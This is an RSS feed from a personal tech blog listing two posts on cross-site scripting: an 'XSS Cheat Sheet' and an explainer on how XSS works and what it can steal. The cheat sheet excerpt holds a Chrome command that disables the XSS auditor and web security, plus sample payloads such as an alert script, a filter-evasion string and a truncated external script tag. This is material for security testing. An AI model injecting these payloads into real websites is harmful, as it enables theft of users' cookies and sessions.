<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>XSS on Shaowen Chen's Website</title><link>https://www.chenshaowen.com/en/tags/xss/</link><description>Recent content in XSS on Shaowen Chen's Website</description><generator>Hugo -- gohugo.io</generator><language>en</language><copyright>&amp;copy;2016 - {year}, All Rights Reserved.</copyright><lastBuildDate>Sat, 20 May 2017 09:12:31 +0000</lastBuildDate><sy:updatePeriod>weekly</sy:updatePeriod><atom:link href="https://www.chenshaowen.com/en/tags/xss/atom.xml" rel="self" type="application/rss+xml"/><item><title>XSS Cheat Sheet</title><link>https://www.chenshaowen.com/en/blog/xss-cheat-sheet.html</link><pubDate>Sat, 20 May 2017 09:12:31 +0000</pubDate><atom:modified>Sat, 20 May 2017 09:12:31 +0000</atom:modified><guid>https://www.chenshaowen.com/en/blog/xss-cheat-sheet.html</guid><description>If you use the Chrome browser to test XSS vectors, disable the browser&amp;rsquo;s XSS interception first. First, close all Chrome browser processes, then run:
1 chrome.exe -args --disable-xss-auditor --args --disable-web-security Enter non-web-safe mode.
1. Injecting HTML/JavaScript with the &amp;lt;&amp;gt; tags 1 &amp;lt;script&amp;gt;alert(&amp;#39;XSS&amp;#39;)&amp;lt;/script&amp;gt; 1 &amp;#39;&amp;#39;;!--&amp;#34;&amp;lt;XSS&amp;gt;=&amp;amp;{()} 1 2 //The quotes around SRC can be omitted &amp;lt;SCRIPT SRC=http://ha.</description><dc:creator>微信公众号</dc:creator><category>Security</category><category>XSS</category><category>R&amp;D</category><category>Vulnerability</category><category>Frontend</category></item><item><title>XSS Principles and Construction</title><link>https://www.chenshaowen.com/en/blog/principle-and-construction-of-xss.html</link><pubDate>Tue, 16 May 2017 20:04:53 +0000</pubDate><atom:modified>Tue, 16 May 2017 20:04:53 +0000</atom:modified><guid>https://www.chenshaowen.com/en/blog/principle-and-construction-of-xss.html</guid><description>XSS is an attack technique that executes JavaScript in the frontend. With the popularity of UGC sites, the data generated by users has surged, and the ever-denser network of data blocks makes it easier to carry out and spread XSS. The damage XSS causes includes: stealing user cookies and personal information; hijacking sessions and manipulating users&amp;rsquo; network data; launching DDoS attacks; tampering with pages, popping up ads, and so on.</description><dc:creator>微信公众号</dc:creator><category>Security</category><category>JavaScript</category><category>XSS</category><category>R&amp;D</category></item></channel></rss>